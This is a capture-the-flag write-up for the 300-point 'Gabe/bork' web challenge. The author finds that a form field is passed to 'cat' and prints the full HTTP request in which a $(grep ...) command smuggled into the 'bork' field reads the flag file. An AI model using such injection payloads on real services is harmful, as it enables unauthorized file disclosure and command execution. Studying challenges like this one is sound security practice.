Category: Web

Points: 300


UPDATE: We have made changes to this challenge to make it (somewhat) stable. If what you were trying before is not working, it's because it was causing a problem for us on the back end. I assure you that what you were doing was not the easiest solution, anyway.

We all love doggos and puppers. Have some more of one of our favorite puppers, Gabe. Bork.



If you post to /bork and try to grab a random file, say, flag.txt, it prints out an error

cat: borks/flag.txt: No such file or directory?autoplay=1&loop=1

This means it’s taking our input and passing it to “cat”. Can we abuse this to disclose other files? What about chain commands for command injection? It looks like when we try to do something not allowed we get presented with an error page

TFW You Can't Pet Gabe

After some more testing, I found that some commands could be injected while others were being filtered. Note: In an effort to increase stability, eventually even $ methods of injection were filtered out, making my solution incorrect. Doesn’t matter, had flag.

However, I was able to succeed by passing the following:

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

bork=$(grep -r '.' -e "RC3")

Which returned:

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Sat, 19 Nov 2016 22:20:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 416

<!DOCTYPE html>
        <link rel="stylesheet" type="text/css" href="/static/bork.css">
        <link rel="shortcut icon" href="/static/favicon.ico">
        <h1>HERE'S YOUR BORK!!!!</h1>
        <iframe width="854" height="480" src="cat: &#39;borks/./bork.txt:RC3-2016-L057d0g3&#39;: No such file or directory?autoplay=1&loop=1" frameborder="0"></iframe>

That looks like a flag to me!